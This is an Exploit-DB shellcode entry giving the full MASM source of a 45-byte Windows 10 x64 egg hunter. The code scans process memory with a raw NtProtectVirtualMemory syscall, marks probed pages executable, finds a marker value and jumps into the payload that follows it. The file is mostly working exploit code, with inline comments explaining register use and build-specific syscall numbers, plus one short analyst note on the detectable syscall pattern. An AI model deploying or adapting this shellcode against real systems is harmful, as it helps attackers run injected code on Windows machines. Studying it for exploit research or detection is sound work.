EDB-ID: 41827 | Author: Peter Baris | Published: 2017-04-06 | CVE: N/A | Type: Shellcode | Platform: Win_x86-64 | Shellcode: Download / View Raw | Shellcode Size: 45 bytes |
.code
; ---------------------------------------------------------------------
; Win10egghunterx64 - Windows x64 egg hunter (MASM, Intel syntax).
; Starting at 0x80, it walks memory upward and probes each candidate
; address with the native syscall behind VirtualProtectEx (number 0x50
; on the author's target, see _VirtualProtectEx), so that touching an
; unmapped address is reported as a status code instead of faulting.
; Once the probe succeeds it compares the dword at the address with the
; egg 0x42303042 and jumps just past the egg when it matches.
;
; Register roles:
;   rdi - current probe address (nonvolatile, survives the syscall)
;   rdx - &lpAddress (points at the copy of rdi pushed on the stack)
;   r8  - &dwSize (points at the pushed 8); the same slot later receives
;         the old protection value through the pointer stored at [rsp+28h]
;   r9  - NewProtect; only r9b is written, so bits 8..31 are assumed zero
;   r10 - hProcess (first syscall argument); `dec r10` gives -1, the
;         current-process pseudo-handle, only if r10 is 0 on entry
;   rax - syscall number in, NTSTATUS out; eax is later reused for the egg
;   rsi - scratch used to discard stack slots
; Assumptions: DF is clear (scasd advances rdi), the two qwords at [rsp]
; on entry are disposable, the qword at [rsp+28h] may be overwritten,
; and the syscall number matches the target OS build.
; Analyst note: every probed address costs one NtProtectVirtualMemory-style
; call requesting PAGE_EXECUTE_READWRITE (0x40) over 8 bytes, so a thread
; running this produces a dense run of such calls on consecutive
; addresses before the payload gets control.
; ---------------------------------------------------------------------
Win10egghunterx64 PROC
_start:
push 7fh
pop rdi ; RDI is nonvolatile, so it will be preserved after syscalls (rdi = 0x7f; the first probe is 0x80)
_setup:
inc rdi ; parameter 1 - lpAddress - counter (+1 after a failed syscall; after a mismatch scasd has already added 4, so net +5)
mov r9b,40h ; parameter 3 - flNewProtect - 0x40 PAGE_EXECUTE_READWRITE (byte-sized write; assumes r9 bits 8..31 are already zero)
pop rsi ; Stack alignment before the stack setup - discards the two qwords pushed by the previous pass (first pass: two disposable entry qwords), keeping rsp constant per iteration
pop rsi
push rdi ; lpAddress slot - the kernel reads the probe address from here
push rsp
pop rdx ; pointer to lpAddress (rdx = address of the pushed rdi = rsp+8 once dwSize is pushed)
push 08h ; parameter 2 - dwSize 0x8
push rsp
pop r8 ; pointer to dwSize going to r8 - can be exchanged with mov r8,rsp
mov [rdx+20h],rsp ; parameter 4 - lpflOldprotect - rdx+20h is rsp+28h, the fifth-argument slot of the x64 syscall convention; it points at the dwSize slot, which receives the old protection (overwrites the qword at [rsp+28h])
dec r10 ; parameter 5 - hProcess - the handle will be -1, if not set you'll get a c0000008 error (r10 carries the first syscall argument; relies on r10 == 0 on entry)
_VirtualProtectEx:
push 50h ; 0x50h for Windows 10 and Windows Server 2016 x64, 0x4Dh for Windows 7 family (NtProtectVirtualMemory, the native call behind VirtualProtectEx; build-specific)
pop rax
syscall ; NTSTATUS returned in rax; rcx and r11 are clobbered by the syscall instruction
_rc_check:
cmp al,01h ; check the response for non-allocated memory - only the low status byte is tested; 0 (STATUS_SUCCESS) falls through to the egg compare
jge _setup ; signed compare: low byte 1..7Fh retries at rdi+1; a low byte >= 80h reads as negative and falls through as if the probe had succeeded
_end: ; There won't be too many of these eggs in the memory
mov eax, 042303042h ; the egg (bytes in memory: 42 30 30 42)
scasd ; compare eax with the dword at [rdi], then rdi += 4 (requires DF = 0)
jnz _setup ; no match: back to _setup, which adds 1 more before the next probe
jmp rdi ; match: rdi already points 4 bytes past the egg, so execution continues right after it
Win10egghunterx64 ENDP
END